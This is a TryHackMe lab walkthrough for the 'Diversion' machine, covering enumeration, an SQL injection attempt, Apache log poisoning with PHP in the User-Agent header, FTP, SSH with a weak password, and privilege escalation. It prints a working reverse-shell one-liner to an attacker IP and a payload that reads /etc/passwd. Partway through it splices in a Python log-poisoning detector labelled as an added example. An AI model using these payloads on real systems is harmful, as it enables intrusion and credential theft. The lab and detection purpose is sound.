Diversion TryHackMe Walkthrough

Bwiz
2 min read, May 26, 2024


Welcome to the Diversion walkthrough! This guide will take you through the steps to identify and exploit the vulnerabilities within this virtual machine. Let’s get started!

Room link:

https://tryhackme.com/jr/diversionIb

Step 1: Enumeration

Start with Nmap Scan:

  • Begin by scanning the target machine to identify open ports and services.
nmap -sC -sV -oN nmap_initial_scan.txt <TARGET_IP>

Review Nmap Results:

  • The scan reveals three open ports:
      • 22/tcp: SSH
      • 80/tcp: HTTP
      • 21/tcp: FTP

Step 2: Investigate HTTP Service

Access the Web Server:

  • Open the web browser and navigate to http://<TARGET_IP>/. You’ll find a login page.

Inspect the Source Code:

  • Check the source code of the login page for any clues or vulnerabilities.

Try SQL Injection:

  • Attempt a basic SQL injection to bypass the login:
    Username: admin' OR '1'='1
    Password: anything

Unsuccessful Login:

  • The injection fails and you cannot log into the system this way. The login page is a diversion!

Step 3: Explore the Web Application

Directory Busting:

  • Check for other directories on the web server:
dirsearch -u <TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
  • You’ll find a test directory containing a single log.txt file. Within it you will see mention of an access_log.php file, which can be accessed at http://<TARGET_IP>/access_log.php.

Step 4: Code Injection via Apache Logs

Read the /etc/passwd file:

  • Use a tool like curl to inject a cat command into the User-Agent header:
curl -A "<?php system('cat /etc/passwd'); ?>" http://<TARGET_IP>
  • Navigate to the access_log.php file
  • Make note of a user named jimmy
  • For a more advanced technique, challenge yourself to inject reverse shell code into the log file. For example:
rlwrap -cAr nc -lvnp 80
curl -A "<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.9.2.91 80 >/tmp/f'); ?>" http://10.10.158.198/
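From the defender's side, the same technique leaves a clear trace: the planted PHP sits verbatim in the User-Agent (or Referer) field of the Apache access log. The following detector, an added example that is not part of the original walkthrough, parses combined-format log lines and flags entries whose client-controlled header fields contain PHP open tags or code-execution calls. The log lines and IP addresses are constructed samples.

```python
import re

# Apache "combined" log format: client, ident, user, time, request, status,
# bytes, referer, user-agent. Quoted fields may contain backslash-escaped quotes.
_QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>' + _QUOTED + r')" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>' + _QUOTED + r')" '
    r'"(?P<agent>' + _QUOTED + r')"$'
)

# Indicators that a header value is PHP meant to run when the log is included.
POISON_PATTERNS = [
    re.compile(r'<\?(php|=)', re.IGNORECASE),                                    # PHP open tag
    re.compile(r'\b(system|exec|shell_exec|passthru|eval)\s*\(', re.IGNORECASE), # execution calls
]


def parse_combined(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def is_poisoned(value):
    """True if a header value looks like code planted for log poisoning."""
    return any(p.search(value) for p in POISON_PATTERNS)


def find_log_poisoning(lines):
    """Return (client, time, user_agent) for each line whose Referer or User-Agent looks poisoned."""
    hits = []
    for line in lines:
        fields = parse_combined(line)
        if fields is None:
            continue  # malformed line; a real pipeline would count these separately
        if is_poisoned(fields["agent"]) or is_poisoned(fields["referer"]):
            hits.append((fields["client"], fields["time"], fields["agent"]))
    return hits


# Constructed sample log: benign traffic plus one request carrying the User-Agent
# payload shown above (placeholder addresses, not from any real host).
SAMPLE_LOG = [
    '10.0.0.5 - - [26/May/2024:10:15:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [26/May/2024:10:15:07 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system(\'cat /etc/passwd\'); ?>"',
    '10.0.0.5 - - [26/May/2024:10:15:12 +0000] "GET /access_log.php HTTP/1.1" 200 2048 "-" "curl/8.0.1"',
]

if __name__ == "__main__":
    for client, when, agent in find_log_poisoning(SAMPLE_LOG):
        print(f"{when} poisoning attempt from {client}: {agent}")
```

The detector only surfaces the attempt; the underlying weakness is a PHP page that includes the raw log file, and reading the log through a viewer that does not execute it removes the vulnerability entirely.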

Step 5: Exploit FTP

FTP Enumeration:

  • Connect to the FTP service and look for any interesting files:
ftp <TARGET_IP>
  • Check for anonymous login or default credentials. You will find an adminnote.txt file with mention of a weak password being used: password123

Step 6: SSH

  • We can SSH into the jimmy user account using the found password, password123:
ssh jimmy@<TARGET_IP>

Step 7: Privilege Escalation

Check Sudo Permissions:

  • Once you have a shell, check for any sudo permissions:
sudo -l

Exploit Weak Passwords:

  • If you find any users with weak passwords, use them to escalate privileges:
su <username>

Step 8: Capture the Flags

Locate the Flags:

  • Navigate to the user’s home directory to capture the user flag, then read the root flag once you have escalated privileges:
cat /home/<username>/local.txt
cat /root/proof.txt

Conclusion

Congratulations! You’ve successfully exploited the Diversion VM and captured all the flags. This walkthrough covered SQL injection, Apache log file code injection, FTP, and privilege escalation techniques. Always remember to follow ethical guidelines and use your skills for good.

Happy hacking!
